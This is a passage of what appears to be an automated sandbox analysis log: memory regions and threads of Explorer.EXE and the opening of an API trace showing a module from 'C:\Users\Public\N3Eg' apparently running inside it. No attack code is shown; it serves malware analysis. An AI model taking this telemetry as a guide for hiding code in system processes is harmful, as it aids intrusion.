"\\Windows\\System32\\wevtapi.dll" Region: id = 1932 start_va = 0x57f0000 end_va = 0x5a1afff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1933 start_va = 0x5b90000 end_va = 0x5bcffff entry_point = 0x0 region_type = private name = "private_0x0000000005b90000" filename = "" Region: id = 1934 start_va = 0x5c20000 end_va = 0x5e4cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1935 start_va = 0x5ec0000 end_va = 0x5efffff entry_point = 0x0 region_type = private name = "private_0x0000000005ec0000" filename = "" Region: id = 1936 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1937 start_va = 0x57f0000 end_va = 0x5a1efff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1938 start_va = 0x73490000 end_va = 0x734b4fff entry_point = 0x734977be region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" Region: id = 1939 start_va = 0x5c20000 end_va = 0x5e50fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1940 start_va = 0x733d0000 end_va = 0x73489fff entry_point = 0x733e2584 region_type = mapped_file name = "ActionCenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" Region: id = 1941 start_va = 0x73320000 end_va = 0x733cffff entry_point = 0x7333bbb6 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" Region: id = 1942 start_va = 0x3360000 end_va = 0x3361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003360000" filename = "" Region: id = 1943 start_va = 0x57f0000 end_va = 0x5a22fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1944 start_va = 0x70d80000 end_va = 0x717fffff entry_point = 0x70d86b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" Region: id = 1945 start_va = 0x732a0000 end_va = 0x732dbfff entry_point = 0x732a3089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" Region: id = 1946 start_va = 0x5c20000 end_va = 0x5e54fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1947 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x3230000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" Region: id = 1948 start_va = 0x57f0000 end_va = 0x5a26fff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 1949 start_va = 0x75e70000 end_va = 0x75e9cfff entry_point = 0x75e7296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 1950 start_va = 0x3380000 end_va = 0x3386fff entry_point = 0x3380000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" Region: id = 1951 start_va = 0x72470000 end_va = 0x724a7fff entry_point = 0x7247990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 1952 start_va = 0x731c0000 end_va = 0x7320efff entry_point = 0x731c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" Region: id = 1953 start_va = 0x73210000 end_va = 0x73267fff entry_point = 0x732113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" Region: id = 1954 start_va = 0x73270000 end_va = 0x73297fff entry_point = 0x73273200 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" Region: id = 1955 start_va = 0x3410000 end_va = 0x3411fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003410000" filename = "" Region: id = 1956 start_va = 0x58c0000 end_va = 0x58fffff entry_point = 0x0 region_type = private name = "private_0x00000000058c0000" filename = "" Region: id = 1957 start_va = 0x5c20000 end_va = 0x5e58fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1958 start_va = 0x730a0000 end_va = 0x730d9fff entry_point = 0x730a2a29 region_type = mapped_file name = "FXSAPI.dll" filename = "\\Windows\\System32\\FXSAPI.dll" Region: id = 1959 start_va = 0x730e0000 end_va = 0x731b1fff entry_point = 0x730e162e region_type = mapped_file name = "FXSST.dll" filename = "\\Windows\\System32\\FXSST.dll" Region: id = 1960 start_va = 0x59d0000 end_va = 0x5a0ffff entry_point = 0x0 region_type = private name = "private_0x00000000059d0000" filename = "" Region: id = 1961 start_va = 0x72fb0000 end_va = 0x73092fff entry_point = 0x72fb0000 region_type = mapped_file name = "FXSRESM.dll" filename = "\\Windows\\System32\\FXSRESM.dll" Region: id = 1962 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1963 start_va = 0x72450000 end_va = 0x7245cfff entry_point = 0x72452012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 1964 start_va = 0x75fd0000 end_va = 0x76004fff entry_point = 0x75fd145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 1965 start_va = 0x5fc0000 end_va = 0x61fafff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1966 start_va = 0x5c20000 end_va = 0x5e5cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1967 start_va = 0x5f30000 end_va = 0x5f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 1968 start_va = 0x75200000 end_va = 0x75208fff entry_point = 0x75201220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 1969 start_va = 0x72430000 end_va = 0x72441fff entry_point = 0x72433271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Region: id = 1970 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 1971 start_va = 0x5fc0000 end_va = 0x61fefff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1972 start_va = 0x741e0000 end_va = 0x7425cfff entry_point = 0x741e166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" Region: id = 1973 start_va = 0x5c20000 end_va = 0x5e60fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1974 start_va = 0x5fc0000 end_va = 0x6202fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1975 start_va = 0x5c20000 end_va = 0x5e64fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1976 start_va = 0x5fc0000 end_va = 0x6206fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1977 start_va = 0x5c20000 end_va = 0x5e68fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1978 start_va = 0x57f0000 end_va = 0x58affff entry_point = 0x57f0000 region_type = mapped_file name = "KernelBase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" Region: id = 1979 start_va = 0x75450000 end_va = 0x75457fff entry_point = 0x754534d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 1980 start_va = 0x5fc0000 end_va = 0x620afff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1981 start_va = 0x5c20000 end_va = 0x5e6cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1982 start_va = 0x5fc0000 end_va = 0x620efff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1983 start_va = 0x5c20000 end_va = 0x5e70fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1984 start_va = 0x5fc0000 end_va = 0x6212fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1985 start_va = 0x5c20000 end_va = 0x5e74fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1986 start_va = 0x5fc0000 end_va = 0x6216fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1987 start_va = 0x5c20000 end_va = 0x5e78fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1988 start_va = 0x5fc0000 end_va = 0x621afff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1989 start_va = 0x5c20000 end_va = 0x5e7cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1990 start_va = 0x5fc0000 end_va = 0x621efff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1991 start_va = 0x5c20000 end_va = 0x5e80fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1992 start_va = 0x5fc0000 end_va = 0x6222fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1993 start_va = 0x5c20000 end_va = 0x5e84fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1994 start_va = 0x5fc0000 end_va = 0x6226fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1995 start_va = 0x5c20000 end_va = 0x5e88fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1996 start_va = 0x5fc0000 end_va = 0x622afff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1997 start_va = 0x5c20000 end_va = 0x5e8cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 1998 start_va = 0x5fc0000 end_va = 0x622efff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 1999 start_va = 0x5c20000 end_va = 0x5e90fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2000 start_va = 0x5fc0000 end_va = 0x6232fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2001 start_va = 0x5c20000 end_va = 0x5e94fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2002 start_va = 0x5fc0000 end_va = 0x6236fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2003 start_va = 0x5c20000 end_va = 0x5e98fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2004 start_va = 0x5fc0000 end_va = 0x623afff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2005 start_va = 0x5c20000 end_va = 0x5e9cfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2006 start_va = 0x5fc0000 end_va = 0x623efff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2007 start_va = 0x5c20000 end_va = 0x5ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2008 start_va = 0x5fc0000 end_va = 0x6242fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2009 start_va = 0x5c20000 end_va = 0x5ea4fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2010 start_va = 0x5fc0000 end_va = 0x6246fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2011 start_va = 0x5c20000 end_va = 0x5ea8fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2012 start_va = 0x5fc0000 end_va = 0x624afff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2013 start_va = 0x5c20000 end_va = 0x5eacfff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2014 start_va = 0x5fc0000 end_va = 0x624efff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2015 start_va = 0x5c20000 end_va = 0x5eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2016 start_va = 0x5fc0000 end_va = 0x6252fff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2017 start_va = 0x5c20000 end_va = 0x5ebffff entry_point = 0x0 region_type = private name = "private_0x0000000005c20000" filename = "" Region: id = 2018 start_va = 0x5fc0000 end_va = 0x625bfff entry_point = 0x0 region_type = private name = "private_0x0000000005fc0000" filename = "" Region: id = 2019 start_va = 0x6260000 end_va = 0x639ffff entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 2020 start_va = 0x3420000 end_va = 0x3420fff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 2021 start_va = 0x73280000 end_va = 0x73298fff entry_point = 0x73282754 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\System32\\olepro32.dll" Region: id = 2022 start_va = 0x3430000 end_va = 0x343ffff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 2023 start_va = 0x73270000 end_va = 0x73272fff entry_point = 0x73270000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" Region: id = 2024 start_va = 0x3440000 end_va = 0x3453fff entry_point = 0x3440000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" Region: id = 2025 start_va = 0x35a0000 end_va = 0x35a7fff entry_point = 0x35a0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" Region: id = 2026 start_va = 0x35b0000 end_va = 0x35bbfff entry_point = 0x35b0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" Region: id = 2027 start_va = 0x72f90000 end_va = 0x72faafff entry_point = 0x72f96d66 region_type = mapped_file name = "UIAnimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" Region: id = 2144 start_va = 0x35c0000 end_va = 0x35c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035c0000" filename = "" Region: id = 2145 start_va = 0x35d0000 end_va = 0x35d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035d0000" filename = "" Region: id = 2146 start_va = 0x37e0000 end_va = 0x37e2fff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 2147 start_va = 0x701c0000 end_va = 0x7020cfff entry_point = 0x701c3151 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" Region: id = 2149 start_va = 0x3830000 end_va = 0x3831fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003830000" filename = "" Region: id = 2150 start_va = 0x4c60000 end_va = 0x4c61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c60000" filename = "" Region: id = 2151 start_va = 0x6ffd0000 end_va = 0x6fffdfff entry_point = 0x6ffd16ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" Region: id = 2152 start_va = 0x70000000 end_va = 0x70039fff entry_point = 0x7000144f region_type = mapped_file name = "webcheck.dll" filename = "\\Windows\\System32\\webcheck.dll" Region: id = 2153 start_va = 0x6fd30000 end_va = 0x6ff3dfff entry_point = 0x6fd321fe region_type = mapped_file name = "SyncCenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" Region: id = 2154 start_va = 0x4c70000 end_va = 0x4c71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c70000" filename = "" Region: id = 2155 start_va = 0x6ffd0000 end_va = 0x70033fff entry_point = 0x6ffd13b0 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" Region: id = 2156 start_va = 0x4c80000 end_va = 0x4c81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c80000" filename = "" Region: id = 2157 start_va = 0x6fb90000 end_va = 0x6fbdefff entry_point = 0x6fba9f22 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" Region: id = 2158 start_va = 0x6fb60000 end_va = 0x6fb8afff entry_point = 0x6fb780db region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" Region: id = 2159 start_va = 0x2040000 end_va = 0x2043fff entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2160 start_va = 0x2050000 end_va = 0x2050fff entry_point = 0x2050000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" Region: id = 2161 start_va = 0x2060000 end_va = 0x2060fff entry_point = 0x2060000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" Region: id = 2162 start_va = 0x2070000 end_va = 0x2071fff entry_point = 0x2070000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" Region: id = 2163 start_va = 0x2e70000 end_va = 0x2e70fff entry_point = 0x0 region_type = private name = "private_0x0000000002e70000" filename = "" Region: id = 2164 start_va = 0x2ff0000 end_va = 0x302ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 2165 start_va = 0x3190000 end_va = 0x3190fff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 2166 start_va = 0x31a0000 end_va = 0x31a0fff entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 2167 start_va = 0x31b0000 end_va = 0x31b0fff entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 2168 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 2169 start_va = 0x58b0000 end_va = 0x59affff entry_point = 0x58b0000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" Region: id = 2170 start_va = 0x63a0000 end_va = 0x649ffff entry_point = 0x63a0000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" Region: id = 2171 start_va = 0x64a0000 end_va = 0x659ffff entry_point = 0x64a0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 2172 start_va = 0x6f5c0000 end_va = 0x6f653fff entry_point = 0x6f5cd53d region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" Region: id = 2173 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 2234 start_va = 0x2300000 end_va = 0x2300fff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 2235 start_va = 0x32c0000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2236 start_va = 0x51c0000 end_va = 0x51fffff entry_point = 0x0 region_type = private name = "private_0x00000000051c0000" filename = "" Region: id = 2237 start_va = 0x65a0000 end_va = 0x65effff entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 2238 start_va = 0x65f0000 end_va = 0x669ffff entry_point = 0x65f0000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\DSsDPMx042\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" Region: id = 2239 start_va = 0x6720000 end_va = 0x675ffff entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 2240 start_va = 0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 2241 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 2242 start_va = 0x72470000 end_va = 0x724a7fff entry_point = 0x7247990e region_type = mapped_file name = "FWPUCLNT.DLL" filename = "\\Windows\\System32\\FWPUCLNT.DLL" Region: id = 2243 start_va = 0x6950000 end_va = 0x698ffff entry_point = 0x0 region_type = private name = "private_0x0000000006950000" filename = "" Region: id = 2244 start_va = 0x6ee90000 end_va = 0x6ee9afff entry_point = 0x6ee934a0 region_type = mapped_file name = "idndl.dll" filename = "\\Windows\\System32\\idndl.dll" Region: id = 2245 start_va = 0x77cd0000 end_va = 0x77cd2fff entry_point = 0x77cd0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" Region: id = 2246 start_va = 0x75740000 end_va = 0x7577bfff entry_point = 0x7574145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 2247 start_va = 0x75290000 end_va = 0x75294fff entry_point = 0x752915df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 2248 start_va = 0x75600000 end_va = 0x75643fff entry_point = 0x756163f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 2249 start_va = 0x67f0000 end_va = 0x682ffff entry_point = 0x0 region_type = private name = "private_0x00000000067f0000" filename = "" Region: id = 2250 start_va = 0x6f710000 end_va = 0x6f715fff entry_point = 0x6f7114b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" Region: id = 2251 start_va = 0x75730000 end_va = 0x75735fff entry_point = 0x75731673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 2315 start_va = 0x68b0000 end_va = 0x68effff entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 2316 start_va = 0x6ed50000 end_va = 0x6ed57fff entry_point = 0x6ed52ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" Region: id = 2317 start_va = 0x6f6b0000 end_va = 0x6f709fff entry_point = 0x6f6b1f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" Region: id = 2318 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 2319 start_va = 0x74570000 end_va = 0x7457efff entry_point = 0x745712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" Region: id = 2330 start_va = 0x75c10000 end_va = 0x75c6efff entry_point = 0x75c12134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" Region: id = 2385 start_va = 0x71e80000 end_va = 0x71e85fff entry_point = 0x71e81a24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" Region: id = 2386 start_va = 0x71e90000 end_va = 0x71ea5fff entry_point = 0x71e91240 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" Region: id = 2387 start_va = 0x71e20000 end_va = 0x71e29fff entry_point = 0x71e24c23 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" Region: id = 2388 start_va = 0x71e30000 end_va = 0x71e77fff entry_point = 0x71e353a7 region_type = mapped_file name = "WWanAPI.dll" filename = "\\Windows\\System32\\WWanAPI.dll" Region: id = 2409 start_va = 0x69d0000 end_va = 0x6a0ffff entry_point = 0x0 region_type = private name = "private_0x00000000069d0000" filename = "" Region: id = 2410 start_va = 0x6ea40000 end_va = 0x6ea6dfff entry_point = 0x6ea4bcbf region_type = mapped_file name = "QAGENT.DLL" filename = "\\Windows\\System32\\QAGENT.DLL" Region: id = 2411 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 2673 start_va = 0x6a80000 end_va = 0x6abffff entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 2683 start_va = 0x2050000 end_va = 0x2051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 2684 start_va = 0x2060000 end_va = 0x2061fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002060000" filename = "" Region: id = 2685 start_va = 0x3020000 end_va = 0x305ffff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 2686 start_va = 0x6e070000 end_va = 0x6e189fff entry_point = 0x6e07f0d7 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" Region: id = 2687 start_va = 0x6e190000 end_va = 0x6e19efff entry_point = 0x6e191371 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" Region: id = 2688 start_va = 0x6e1c0000 end_va = 0x6e1d9fff entry_point = 0x6e1cb473 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" Region: id = 2689 start_va = 0x6df00000 end_va = 0x6df11fff entry_point = 0x6df0140e region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" Region: id = 2690 start_va = 0x6df20000 end_va = 0x6df54fff entry_point = 0x6df213d5 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" Region: id = 2691 start_va = 0x6df60000 end_va = 0x6e065fff entry_point = 0x6df62af9 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" Region: id = 2692 start_va = 0x2070000 end_va = 0x2071fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 2693 start_va = 0x6def0000 end_va = 0x6def8fff entry_point = 0x6def21d3 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" Region: id = 2694 start_va = 0x2310000 end_va = 0x2314fff entry_point = 0x2310000 region_type = mapped_file name = "ActionCenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" Region: id = 2695 start_va = 0x6dec0000 end_va = 0x6deeafff entry_point = 0x6dedd3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" Thread: id = 121 os_tid = 0x5e8 Thread: id = 122 os_tid = 0x5c4 Thread: id = 123 os_tid = 0x5b4 Thread: id = 124 os_tid = 0x59c Thread: id = 125 os_tid = 0x594 Thread: id = 126 os_tid = 0x568 Thread: id = 127 os_tid = 0x564 Thread: id = 128 os_tid = 0x560 Thread: id = 129 os_tid = 0x55c Thread: id = 130 os_tid = 0x558 Thread: id = 131 os_tid = 0x52c Thread: id = 132 os_tid = 0x528 Thread: id = 133 os_tid = 0x524 Thread: id = 134 os_tid = 0x494 Thread: id = 135 os_tid = 0x490 Thread: id = 136 os_tid = 0x48c Thread: id = 137 os_tid = 0x488 Thread: id = 138 os_tid = 0x484 Thread: id = 139 os_tid = 0x480 Thread: id = 140 os_tid = 0x47c Thread: id = 141 os_tid = 0x478 Thread: id = 142 os_tid = 0x474 Thread: id = 143 os_tid = 0x628 [0262.990] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fb4d18 [0262.990] GetKeyboardType (nTypeFlag=0) returned 4 [0262.990] GetCommandLineA () returned="C:\\Windows\\Explorer.EXE" [0262.991] GetStartupInfoA (in: lpStartupInfo=0x345f670 | out: lpStartupInfo=0x345f670*(cb=0x44, lpReserved="C:\\Windows\\Explorer.EXE", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\Explorer.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x409, dwFillAttribute=0xf40000, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0262.991] GetVersion () returned 0x1db10106 [0262.991] GetVersion () returned 0x1db10106 [0262.991] GetCurrentThreadId () returned 0x628 [0262.991] GetModuleFileNameA (in: hModule=0x4be0000, lpFilename=0x345f16c, nSize=0x105 | out: lpFilename="C:\\Users\\Public\\N3Eg\\N3Eg4.51N3E") returned 0x20 [0262.991] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x345f047, nSize=0x105 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0262.991] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x345f15c | out: phkResult=0x345f15c*=0x0) returned 0x2 [0262.991] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x345f15c | out: phkResult=0x345f15c*=0x0) returned 0x2 [0262.991] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, 